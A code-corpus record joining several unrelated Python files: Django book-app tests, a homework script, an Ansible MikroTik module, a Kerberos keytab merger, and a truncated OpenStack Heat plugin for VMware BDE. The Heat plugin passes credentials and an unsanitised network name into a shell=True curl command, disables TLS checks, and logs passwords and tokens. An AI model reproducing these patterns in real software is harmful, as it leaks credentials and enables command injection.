self.assertEqual(len(Book.generate_books(books)[0].keys()), 5)
self.assertEqual(Book.generate_books(books)[0], Utils.generate_sort_dict(books[0]))
self.assertEqual(Book.generate_books(books)[6], Utils.generate_sort_dict(books[6]))
# ------------------------------------------------------------------------------------------------------------------
def test_fetch_books(self):
"""
Must generate list of dicts with Books data depending on different criteria.
"""
self.assertTrue(isinstance(Book.fetch_books('book'), list))
self.assertEqual(len(Book.fetch_books('Second Book')), 1)
self.assertEqual(len(Book.fetch_books('book')), 7)
self.assertEqual(len(Book.fetch_books('ook')), 7)
self.assertEqual(len(Book.fetch_books('trueAuthorNew')), 3)
self.assertEqual(len(Book.fetch_books('author')), 7)
self.assertEqual(len(Book.fetch_books('new')), 3)
self.assertEqual(len(Book.fetch_books('True')), 3)
# ------------------------------------------------------------------------------------------------------------------
def test_generate_existing_books(self):
"""
Must generate list of dicts with Books data depending on different criteria and excluding private books.
"""
self.assertTrue(isinstance(Book.generate_existing_books('book'), list))
self.assertEqual(len(Book.generate_existing_books('book')), 5)
self.assertEqual(len(Book.generate_existing_books('Book')), 5)
self.assertEqual(len(Book.generate_existing_books('bOoK')), 5)
fourth_book = Book.objects.get(book_name='Fourth Book')
test_book = Book.generate_existing_books('fourth')
self.assertEqual(len(test_book), 1)
self.assertTrue(isinstance(test_book[0], dict))
self.assertEqual(test_book[0], {'url': reverse('book', args=[fourth_book.id]),
'name': fourth_book.book_name})
test_private_book = Book.generate_existing_books('fifth')
self.assertEqual(len(test_private_book), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_exclude_private_books(self):
"""
Must generate query sets or lists with Books depending on user type.
"""
all_books = Book.objects.all()
list_all_books = list(all_books)
self.assertEqual(Book.exclude_private_books(self.the_user1.id_user, all_books).count(), 7)
self.assertEqual(Book.exclude_private_books(self.the_user2.id_user, all_books).count(), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user1.id_user, all_books), QuerySet))
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user2.id_user, all_books), QuerySet))
self.assertEqual(len(Book.exclude_private_books(self.the_user1.id_user, list_all_books)), 7)
self.assertEqual(len(Book.exclude_private_books(self.the_user2.id_user, list_all_books)), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user1.id_user, list_all_books), list))
self.assertTrue(isinstance(Book.exclude_private_books(self.the_user2.id_user, list_all_books), list))
self.assertTrue(self.anonymous_user.is_anonymous)
self.assertEqual(Book.exclude_private_books(self.anonymous_user, all_books).count(), 5)
self.assertEqual(len(Book.exclude_private_books(self.anonymous_user, list_all_books)), 5)
self.assertTrue(isinstance(Book.exclude_private_books(self.anonymous_user, all_books), QuerySet))
self.assertTrue(isinstance(Book.exclude_private_books(self.anonymous_user, list_all_books), list))
# ------------------------------------------------------------------------------------------------------------------
def test_added_books(self):
self.assertEqual(AddedBook.objects.all().count(), 8)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user5).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user6).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 4)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Third Book')).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Fifth Book')).count(), 0)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Fourth Book')).count(), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_added_books_change(self):
"""
Must save book page after changing it.
"""
added_book3 = AddedBook.objects.get(id_user=self.the_user1, id_book=Book.objects.get(book_name='Third Book'))
added_book6 = AddedBook.objects.get(id_user=self.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
self.assertEqual(added_book3.last_page, 1)
self.assertEqual(added_book6.last_page, 1)
added_book3.last_page = 500
added_book3.save()
self.assertEqual(added_book3.last_page, 500)
self.assertEqual(added_book6.last_page, 1)
added_book6.last_page = 256
added_book6.save()
self.assertEqual(added_book3.last_page, 500)
self.assertEqual(added_book6.last_page, 256)
# ------------------------------------------------------------------------------------------------------------------
def test_added_books_delete(self):
added_book_third = AddedBook.objects.get(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book'))
added_book_sixth = AddedBook.objects.get(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book'))
added_book_third.delete()
added_book_sixth.delete()
self.assertEqual(AddedBook.objects.all().count(), 6)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1).count(), 2)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 3)
self.assertEqual(AddedBook.objects.filter(id_book=Book.objects.get(book_name='Third Book')).count(), 1)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user1,
id_book=Book.objects.get(book_name='Third Book')).count(), 0)
self.assertEqual(AddedBook.objects.filter(id_user=self.the_user2,
id_book=Book.objects.get(book_name='Sixth Book')).count(), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_get_user_added_book(self):
"""
Must generate list of books that added by user (reading by user).
"""
self.assertTrue(self.anonymous_user.is_anonymous)
self.assertEqual(len(AddedBook.get_user_added_books(self.anonymous_user)), 0)
self.assertEqual(AddedBook.get_user_added_books(self.anonymous_user), [])
self.assertEqual(AddedBook.get_user_added_books(self.the_user1.id_user).count(), 3)
self.assertEqual(AddedBook.get_user_added_books(self.the_user5.id_user).count(), 1)
self.assertNotEqual(AddedBook.get_user_added_books(self.the_user1.id_user), [])
removed_obj = AddedBook.objects.get(id_book=Book.objects.get(book_name='Sixth Book'),
id_user=self.the_user5)
removed_obj.delete()
self.assertEqual(AddedBook.get_user_added_books(self.the_user5.id_user).count(), 0)
self.assertNotEqual(AddedBook.get_user_added_books(self.the_user5.id_user), [])
# ------------------------------------------------------------------------------------------------------------------
def test_get_count_added(self):
"""
Must return count how many users is reading some book.
"""
third_book = Book.objects.get(book_name='Third Book')
sixth_book = Book.objects.get(book_name='Sixth Book')
not_existing_id = 10000
self.assertEqual(AddedBook.get_count_added(third_book.id), 2)
self.assertEqual(AddedBook.get_count_added(sixth_book.id), 4)
self.assertEqual(AddedBook.get_count_added(not_existing_id), 0)
removed_third = AddedBook.objects.filter(id_user=self.the_user1, id_book=third_book)
removed_third.delete()
removed_sixth = AddedBook.objects.filter(id_user=self.the_user1, id_book=sixth_book)
removed_sixth.delete()
self.assertEqual(AddedBook.get_count_added(third_book.id), 1)
self.assertEqual(AddedBook.get_count_added(sixth_book.id), 3)
self.assertEqual(AddedBook.get_count_added(not_existing_id), 0)
# ------------------------------------------------------------------------------------------------------------------
def test_book_rating(self):
self.assertEqual(BookRating.objects.all().count(), 6)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.filter(book_name='Third Book')).count(), 3)
self.assertEqual(BookRating.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(BookRating.objects.filter(id_user=self.the_user2).count(), 2)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 2)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user1).count(), 1)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user6).count(), 0)
self.assertEqual(BookRating.objects.filter(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user1,
rating=7).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_changed_book_rating(self):
removed_rating = BookRating.objects.get(id_book=Book.objects.get(book_name='Third Book'),
id_user=self.the_user1)
removed_rating.delete()
self.assertEqual(BookRating.objects.all().count(), 5)
changed_rating1 = BookRating.objects.get(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user2)
changed_rating2 = BookRating.objects.get(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user1)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 2)
self.assertEqual(changed_rating1.rating, 7)
self.assertEqual(changed_rating2.rating, 7)
changed_rating1.rating = 4
changed_rating1.save()
changed_rating2.rating = 3
changed_rating2.save()
self.assertEqual(changed_rating1.rating, 4)
self.assertEqual(changed_rating2.rating, 3)
self.assertEqual(BookRating.objects.filter(rating=7).count(), 0)
self.assertEqual(BookRating.objects.filter(rating=4).count(), 2)
self.assertEqual(BookRating.objects.filter(rating=3).count(), 2)
# ------------------------------------------------------------------------------------------------------------------
def test_book_comment(self):
self.assertEqual(BookComment.objects.all().count(), 5)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user1).count(), 3)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book')).count(), 2)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Fourth Book')).count(), 2)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Sixth Book')).count(), 0)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user6).count(), 0)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1).count(), 1)
BookComment.objects.create(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1,
text='New comment user1 book 2')
self.assertEqual(BookComment.objects.all().count(), 6)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user1).count(), 4)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book')).count(), 3)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Second Book'),
id_user=self.the_user1).count(), 2)
deleted_comment = BookComment.objects.get(id_book=Book.objects.get(book_name='Fourth Book'),
id_user=self.the_user5)
deleted_comment.delete()
self.assertEqual(BookComment.objects.all().count(), 5)
self.assertEqual(BookComment.objects.filter(id_user=self.the_user5).count(), 0)
self.assertEqual(BookComment.objects.filter(id_book=Book.objects.get(book_name='Fourth Book')).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_post_messages(self):
self.assertEqual(Post.objects.all().count(), 3)
self.assertEqual(Post.objects.filter(user=self.the_user1).count(), 2)
self.assertEqual(Post.objects.filter(user=self.the_user2).count(), 1)
deleted_post = Post.objects.get(user=self.the_user1, heading='post 2')
deleted_post.delete()
self.assertEqual(Post.objects.all().count(), 2)
self.assertEqual(Post.objects.filter(user=self.the_user1).count(), 1)
self.assertEqual(Post.objects.filter(user=self.the_user2).count(), 1)
# ------------------------------------------------------------------------------------------------------------------
def test_support_messages(self):
self.assertEqual(SupportMessage.objects.all().count(), 4)
self.assertEqual(SupportMessage.objects.filter(email='[email protected]').count(), 2)
self.assertEqual(SupportMessage.objects.filter(email='[email protected]').count(), 1)
self.assertEqual(SupportMessage.objects.filter(is_checked=False).count(), 4)
checked_message = SupportMessage.objects.get(email='[email protected]', text='Test text1')
checked_message.is_checked = True
checked_message.save()
self.assertEqual(SupportMessage.objects.filter(is_checked=False).count(), 3)
# ------------------------------------------------------------------------------------------------------------------
def tearDown(self):
for book in Book.objects.all():
if os.path.exists(book.book_file.path):
os.remove(book.book_file.path)
if book.photo and os.path.exists(book.photo.path):
os.remove(book.photo.path)
| OlegKlimenko/Plamber | app/tests/test_models.py | Python | apache-2.0 | 53,921 |
# Задача 5. Вариант 6.
# Напишите программу, которая бы при запуске случайным образом отображала название одного из двух спутников Марса.
# Velyan A. S.
# 27.05.2016
print("\nназвание одного из двух спутников Марса:")
import random
satellite=["Фобос", "Деймос"]
s=random.choice(satellite)
print(s)
input("Нажмите Enter для выхода") | Mariaanisimova/pythonintask | PMIa/2015/Velyan_A_S/task_5_6.py | Python | apache-2.0 | 503 |
def test_signal_wikidata_url(ranker):
rank = lambda url: ranker.client.get_signal_value_from_url("wikidata_url", url)
assert rank("http://www.douglasadams.com") > 0.5
assert rank("http://www.douglasadams.com/?a=b") > 0.5
assert rank("http://www.douglasadams.com/page2") == 0. # TODO, check domain?
assert rank("http://www.paulherbert.com/") == 0.
| commonsearch/cosr-back | tests/cosrlibtests/signals/test_wikidata.py | Python | apache-2.0 | 370 |
# -*- coding: utf-8 -*-
DOCUMENTATION = '''
module: mt_system.py
author:
- "Valentin Gurmeza"
version_added: "2.4"
short_description: Manage mikrotik system endpoints
requirements:
- mt_api
description:
- manage mikrotik system parameters
options:
hostname:
description:
- hotstname of mikrotik router
required: True
username:
description:
- username used to connect to mikrotik router
required: True
password:
description:
- password used for authentication to mikrotik router
required: True
parameter:
description:
- sub enpoint for mikrotik system
required: True
options:
- ntp_client
- clock
- logging
- routerboard
- identity
settings:
description:
- All Mikrotik compatible parameters for this particular endpoint.
Any yes/no values must be enclosed in double quotes
state:
description:
- absent or present
'''
EXAMPLES = '''
- mt_system:
hostname: "{{ inventory_hostname }}"
username: "{{ mt_user }}"
password: "{{ mt_pass }}"
parameter: identity
settings:
name: test_ansible
'''
from ansible.module_utils.mt_common import clean_params, MikrotikIdempotent
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
argument_spec = dict(
hostname = dict(required=True),
username = dict(required=True),
password = dict(required=True, no_log=True),
settings = dict(required=False, type='dict'),
parameter = dict(
required = True,
choices = ['ntp_client', 'clock', 'identity', 'logging', 'routerboard_settings'],
type = 'str'
),
state = dict(
required = False,
choices = ['present', 'absent'],
type = 'str'
),
),
supports_check_mode=True
)
params = module.params
if params['parameter'] == 'routerboard_settings':
params['parameter'] = 'routerboard/settings'
if params['parameter'] == 'ntp_client':
params['parameter'] = 'ntp/client'
clean_params(params['settings'])
mt_obj = MikrotikIdempotent(
hostname = params['hostname'],
username = params['username'],
password = params['password'],
state = params['state'],
desired_params = params['settings'],
idempotent_param= None,
api_path = '/system/' + params['parameter'],
check_mode = module.check_mode
)
mt_obj.sync_state()
if mt_obj.failed:
module.fail_json(
msg = mt_obj.failed_msg
)
elif mt_obj.changed:
module.exit_json(
failed=False,
changed=True,
msg=mt_obj.changed_msg,
diff={ "prepared": {
"old": mt_obj.old_params,
"new": mt_obj.new_params,
}},
)
else:
module.exit_json(
failed=False,
changed=False,
#msg='',
msg=params['settings'],
)
if __name__ == '__main__':
main()
| zahodi/ansible-mikrotik | library/mt_system.py | Python | apache-2.0 | 2,989 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple utility to merge multiple Kerberos keytabs into one.
This also cleans out duplicate and old keytab entries.
"""
import functools
import struct
# from http://pig.made-it.com/kerberos-etypes.html
ETYPES = {
1: 'des-cbc-crc',
2: 'des-cbc-md4',
3: 'des-cbc-md5',
4: None,
5: 'des3-cbc-md5',
6: None,
7: 'des3-cbc-sha1',
9: 'dsaWithSHA1-CmsOID',
10: 'md5WithRSAEncryption-CmsOID',
11: 'sha1WithRSAEncryption-CmsOID',
12: 'rs2CBC-EnvOID',
13: 'rsaEncryption-EnvOID',
14: 'rsaES-OAEP-ENV-OID',
15: 'des-ede3-cbc-Env-OID',
16: 'des3-cbc-sha1-kd',
17: 'aes128-cts-hmac-sha1-96',
18: 'aes256-cts-hmac-sha1-96',
23: 'rc4-hmac',
24: 'rc4-hmac-exp',
65: 'subkey-experimental',
}
NTYPES = {
1: 'KRB5_NT_PRINCIPAL',
2: 'KRB5_NT_SRV_INST',
3: 'KRB5_NT_SRV_HST',
4: 'KRB5_NT_SRV_XHST',
5: 'KRB5_NT_UID',
6: 'KRB5_NT_X500_PRINCIPAL',
7: 'KRB5_NT_SMTP_NAME',
10: 'KRB5_NT_ENTERPRISE_PRINCIPAL',
11: 'KRB5_NT_WELLKNOWN',
4294967166: 'KRB5_NT_ENT_PRINCIPAL_AND_ID',
4294967167: 'KRB5_NT_MS_PRINCIPAL_AND_ID',
4294967168: 'KRB5_NT_MS_PRINCIPAL',
}
class KeytabEntry(object):
"""An entry in the Keytab."""
def __init__(self, data=None):
self._data = data
self._size = len(data)
self._realm = None
self._components = []
self._name_type = None
self._timestamp = None
self._vno8 = None
self._key = None
self._vno = None
self._i = 0
if data:
self._parse()
def __base_check(self, other):
if (self.name != other.name or
self.realm != other.realm or
self.keyblock['type'] != other.keyblock['type']):
return False
return True
def __eq__(self, other):
if not isinstance(other, KeytabEntry):
return NotImplemented
if self._data:
return self._data.__eq__(other)
return False
def __hash__(self):
return self._data.__hash__()
def __str__(self):
return '%s@%s/%s VNO:%d' % (self.name, self._realm, self.key_type,
self.vno)
def __repr__(self):
return self.__str__()
# The use of properties is mainly to reinforce that this is read-only
@property
def vno(self):
return self._vno or self._vno8
@property
def realm(self):
return self._realm
@property
def timestamp(self):
return self._timestamp
@property
def name(self):
return '/'.join(self._components)
@property
def name_type(self):
return NTYPES.get(self._name_type, self._name_type)
@property
def key(self):
return self._key['key']
@property
def key_type(self):
return ETYPES.get(self._key['type'], self._key['type'])
@property
def ts(self):
return self._timestamp
def loads(self, data):
self._data = data
self._size = len(data)
self._parse()
def _encode_size(self):
return struct.pack('!i', self._size)
def dumps(self):
value = struct.pack('!i', self._size) + self._data
return value
def _unpack(self, fmt, size):
value = struct.unpack(fmt, self._data[self._i:self._i + size])
self._i += size
return value[0]
def _uint8(self):
n = self._unpack('!B', 1)
return n
def _uint16(self):
n = self._unpack('!H', 2)
return n
def _int32(self):
n = self._unpack('!i', 4)
return n
def _uint32(self):
n = self._unpack('!I', 4)
return n
def _counted_octet_string(self):
size = self._uint16()
counted_string = self._unpack('!%ds' % size, size)
return counted_string
def _keyblock(self):
key = {
'type': self._uint16(),
'key': self._counted_octet_string()
}
return key
def _parse(self):
self._i = 0
n_components = self._uint16()
self._realm = self._counted_octet_string()
for i in range(n_components):
self._components.append(self._counted_octet_string())
self._name_type = self._uint32()
self._timestamp = self._uint32()
self._vno8 = self._uint8()
self._key = self._keyblock()
# special case. may not be present
if self._size - self._i >= 4:
self._vno = self._uint32()
class Keytab(object):
def __init__(self, f=None):
self.entries = {}
self.format_version = None
if f:
self.load(f)
def load(self, f):
entries = set()
format_version = struct.unpack('!H', f.read(2))[0]
if format_version != 0x502:
raise Exception("Unsupport file format %x" % format_version)
self.format_version = format_version
size_packed = f.read(4)
while size_packed != '':
size = struct.unpack('!i', size_packed)[0]
if size > 0:
entries.add(KeytabEntry(f.read(size)))
else:
f.read(-size)
size_packed = f.read(4)
self.add_entries(entries)
def add_entry(self, entry):
r = self.entries.setdefault(entry.realm, {})
n = r.setdefault(entry.name, {})
if entry.key_type in n:
old_entry = n[entry.key_type]
if entry.vno > old_entry.vno:
self.entries[entry.realm][entry.name][entry.key_type] = entry
else:
n[entry.key_type] = entry
def add_entries(self, entries):
for e in entries:
self.add_entry(e)
def save(self, f):
f.write(struct.pack('!H', 0x502))
for e in self.entry_list():
f.write(e.dumps())
def entry_list(self):
entries = []
for realm in self.entries:
for name in self.entries[realm]:
for keytype in self.entries[realm][name]:
entries.append(self.entries[realm][name][keytype])
return entries
def main(main_args):
merged_keytab = Keytab()
for f in main_args.keytabs:
merged_keytab.add_entries(Keytab(f).entry_list())
f.close()
outfile = open(main_args.outfile, 'w')
merged_keytab.save(outfile)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Merge keytabs')
parser.add_argument('keytabs', metavar='ktfile', type=file, nargs='+',
help='a kerberos keytab to read in')
parser.add_argument('-o', '--outfile', dest='outfile', type=str,
help='output file')
args = parser.parse_args()
main(args)
| blaedd/miscutils | ktmerge/ktmerge.py | Python | apache-2.0 | 6,839 |
#!/usr/bin/python
#
# OpenStack Heat Plugin for interfacing with VMware Big Data Extensions
#
# Chris Mutchler - [email protected]
# http://www.VirtualElephant.com
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import json
import base64
import requests
import subprocess
import pyVmomi
from pyVim import connect
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vmodl, vim
from heat.engine import constraints, properties, resource
from heat.openstack.common import log as logging
from neutronclient.neutron import client
logger = logging.getLogger(__name__)
class BigDataExtensions(resource.Resource):
PROPERTIES = (
BDE_ENDPOINT, VCM_SERVER, USERNAME, PASSWORD,
CLUSTER_NAME, CLUSTER_TYPE, NETWORK, CLUSTER_PASSWORD, CLUSTER_RP,
VIO_CONFIG, BDE_CONFIG, SECURITY_GROUP, SUBNET
) = (
'bde_endpoint', 'vcm_server', 'username', 'password',
'cluster_name', 'cluster_type', 'network', 'cluster_password', 'cluster_rp',
'vio_config', 'bde_config', 'security_group', 'subnet'
)
properties_schema = {
BDE_ENDPOINT: properties.Schema(
properties.Schema.STRING,
required=True,
default='bde.localdomain'
),
VCM_SERVER: properties.Schema(
properties.Schema.STRING,
required=True,
default='vcenter.localdomain'
),
USERNAME: properties.Schema(
properties.Schema.STRING,
required=True,
default='[email protected]'
),
PASSWORD: properties.Schema(
properties.Schema.STRING,
required=True,
default='password'
),
CLUSTER_NAME: properties.Schema(
properties.Schema.STRING,
required=True
),
CLUSTER_TYPE: properties.Schema(
properties.Schema.STRING,
required=True
),
NETWORK: properties.Schema(
properties.Schema.STRING,
required=True
),
CLUSTER_PASSWORD: properties.Schema(
properties.Schema.STRING,
required=False
),
CLUSTER_RP: properties.Schema(
properties.Schema.STRING,
required=True,
default='openstackRP'
),
VIO_CONFIG: properties.Schema(
properties.Schema.STRING,
required=True,
default='/usr/local/bin/etc/vio.config'
),
BDE_CONFIG: properties.Schema(
properties.Schema.STRING,
required=False,
default='/usr/local/bin/etc/bde.config'
),
SECURITY_GROUP: properties.Schema(
properties.Schema.STRING,
required=False,
default='9d3ecec8-e0e3-4088-8c71-8c35cd67dd8b'
),
SUBNET: properties.Schema(
properties.Schema.STRING,
required=True
)
}
def _open_connection(self):
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
header = {'content-type': 'application/x-www-form-urlencoded'}
prefix = 'https://'
port = ':8443'
auth_string = "/serengeti/j_spring_security_check"
data = 'j_username=' + bde_user + '&j_password=' + bde_pass
s = requests.session()
url = prefix + bde_server + port + auth_string
r = s.post(url, data, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Authentication status code %s") % r.json)
return s
def _close_connection(self):
bde_server = self.properties.get(self.BDE_ENDPOINT)
header = {'content-type': 'application/x-www-form-urlencoded'}
url = 'https://' + bde_server + ':8443/serengeti/j_spring_security_logout'
s = requests.session()
r = s.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Log out status code %s") % r.json)
return
def _create_nsx_ports(self):
# Load VIO environment variables from /usr/local/etc/vio.config
in_file = "/usr/local/etc/vio.config"
f = open(in_file, "ro")
for line in f:
if "OS_AUTH_URL" in line:
trash, os_auth_url = map(str, line.split("="))
os_auth_url = os_auth_url.rstrip('\n')
logger.info(_("VirtualElephant::VMware::BDE - DEBUG os_auth_url %s") % os_auth_url)
elif "OS_TENANT_ID" in line:
trash, os_tenant_id = map(str,line.split("="))
os_tenant_id = os_tenant_id.rstrip('\n')
elif "OS_TENANT_NAME" in line:
trash, os_tenant_name = map(str, line.split("="))
os_tenant_name = os_tenant_name.rstrip('\n')
elif "OS_USERNAME" in line:
trash, os_username = map(str, line.split("="))
os_username = os_username.rstrip('\n')
elif "OS_PASSWORD" in line:
trash, os_password = map(str, line.split("="))
os_password = os_password.rstrip('\n')
elif "OS_URL" in line:
trash, os_url = map(str, line.split("="))
os_url = os_url.rstrip('\n')
elif "OS_TOKEN" in line:
trash, os_token = map(str, line.split("="))
os_token = os_token.rstrip('\n')
d = {}
d['username'] = os_username
d['password'] = os_password
d['auth_url'] = os_auth_url
d['tenant_name'] = os_tenant_name
d['token'] = os_token
d['url'] = os_url
logger.info(_("VirtualElephant::VMware::BDE - Loaded VIO credentials - %s") % d)
# Using BDE API and vSphere API return the MAC address
# for the virtual machines created by BDE.
bde_server = self.properties.get(self.BDE_ENDPOINT)
vcm_server = self.properties.get(self.VCM_SERVER)
admin_user = self.properties.get(self.USERNAME)
admin_pass = self.properties.get(self.PASSWORD)
cluster_name = self.properties.get(self.CLUSTER_NAME)
network_id = self.properties.get(self.NETWORK)
security_group = self.properties.get(self.SECURITY_GROUP)
prefix = 'https://'
port = ':8443'
logger.info(_("VirtualElephant::VMware::BDE - Creating NSX ports for network %s") % network_id)
# Get the node names for the cluster from BDE
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + cluster_name
url = prefix + bde_server + port + api_call
r = curr.get(url, headers=header, verify=False)
raw_json = json.loads(r.text)
cluster_data = raw_json["nodeGroups"]
# Open connect to the vSphere API
si = SmartConnect(host=vcm_server, user=admin_user, pwd=admin_pass, port=443)
search_index = si.content.searchIndex
root_folder = si.content.rootFolder
for ng in cluster_data:
nodes = ng["instances"]
for node in nodes:
logger.info(_("VirtualElephant::VMware::BDE - Creating NSX port for %s") % node.get("name"))
vm_name = node.get("name")
vm_moId = node.get("moId")
port_name = vm_name + "-port0"
# moId is not in format we need to match
(x,y,z) = vm_moId.split(":")
vm_moId = "'vim." + y + ":" + z + "'"
# Go through each DC one at a time, in case there are multiple in vCenter
for dc in root_folder.childEntity:
content = si.content
objView = content.viewManager.CreateContainerView(dc, [vim.VirtualMachine], True)
vm_list = objView.view
objView.Destroy()
for instance in vm_list:
# convert object to string so we can search
i = str(instance.summary.vm)
if vm_moId in i:
# Matched the VM in BDE and vCenter
logger.info(_("VirtualElephant::VMware::BDE - Match found for BDE node %s") % instance)
for device in instance.config.hardware.device:
if isinstance(device, vim.vm.device.VirtualEthernetCard):
mac_address = str(device.macAddress)
logger.info(_("VirtualElephant::VMware::BDE - Found MAC address %s") % mac_address)
# If the node is already trying to get an IP address,
# then a powercycle is required.
#logger.info(_("VirtualElephant::VMware::BDE - Powercycling the node %s") % node.get("name"))
#if instance.runtime.powerState == vim.VirtualMachinePowerState.poweredOn:
# task = instance.PowerOff()
# while task.info.state not in [vim.TaskInfo.State.success,
# vim.TaskInfo.State.error]:
# logger.info(_("VirtualElephant::VMware::BDE - Waiting for node power off %s") % node.get("name"))
# time.sleep(5)
# task = instance.PowerOn()
# while task.info.state not in [vim.TaskInfo.State.success,
# vim.TaskInfo.State.error]:
# logger.info(_("VirtualElephant::VMware::BDE - Waiting for node power on %s") % node.get("name"))
# time.sleep(5)
# Create a new port through Neutron
neutron = client.Client('2.0',
username=os_username,
password=os_password,
auth_url=os_auth_url,
tenant_name=os_tenant_name,
endpoint_url=os_url,
token=os_token)
port_info = {
"port": {
"admin_state_up": True,
"device_id": vm_name,
"name": port_name,
"mac_address": mac_address,
"network_id": network_id
}
}
logger.info(_("VirtualElephant::VMware::BDE - Neutron port string %s") % port_info)
response = neutron.create_port(body=port_info)
logger.info(_("VirtualElephant::VMware::BDE - NSX port creation response - %s") % response)
return
def handle_create(self):
# REST API call to create a new VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
vcm_server = self.properties.get(self.VCM_SERVER)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
distro = self.properties.get(self.CLUSTER_TYPE)
clusterName = self.properties.get(self.CLUSTER_NAME)
network = self.properties.get(self.NETWORK)
rp = self.properties.get(self.CLUSTER_RP)
prefix = 'https://'
port = ':8443'
# hack because of Heat sends call before NSX network is created/assigned
#time.sleep(60)
# determine actual NSX portgroup created
# hack - regex in Python is not a strength
mob_string = '/mob/?moid=datacenter-2'
curl_cmd = 'curl -k -u ' + bde_user + ':' + bde_pass + ' ' + prefix + vcm_server + mob_string
grep_cmd = " | grep -oP '(?<=\(vxw).*(?=" + network + "\))' | grep -oE '[^\(]+$'"
awk_cmd = " | awk '{print $0 \"" + network + "\"}'"
full_cmd = curl_cmd + grep_cmd + awk_cmd
p = subprocess.Popen(full_cmd, stdout=subprocess.PIPE, shell=True)
(net_uid, err) = p.communicate()
# Check to see if network_id is as we expect it
if 'vxw' in net_uid:
network_id = net_uid
else:
network_id = "vxw" + net_uid
network_id = network_id.rstrip('\n')
# Authenticate in a requests.session to the BDE server
curr = self._open_connection()
# Should check to see if network already exists as available network
# This logs a big fat error message in /opt/serengeti/logs/serengeti.log
# when the network doesn't exist.
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/network/' + network
url = prefix + bde_server + port + api_call
r = curr.get(url, headers=header, verify=False)
# Add new network to BDE as an available network if check fails
payload = {"name" : network, "portGroup" : network_id, "isDhcp" : "true"}
api_call = '/serengeti/api/networks'
url = prefix + bde_server + port + api_call
r = curr.post(url, data=json.dumps(payload), headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Network creation status code %s") % r.json)
# Send the create cluster REST API call
payload = {"name": clusterName, "distro": distro, "rpNames": [rp], "networkConfig": { "MGT_NETWORK": [network]}}
api_call = '/serengeti/api/clusters'
url = prefix + bde_server + port + api_call
r = curr.post(url, data=json.dumps(payload), headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Create cluster status code %s") % r.json)
# Arbitrary sleep value to allow for the nodes to be cloned
sleep = 180
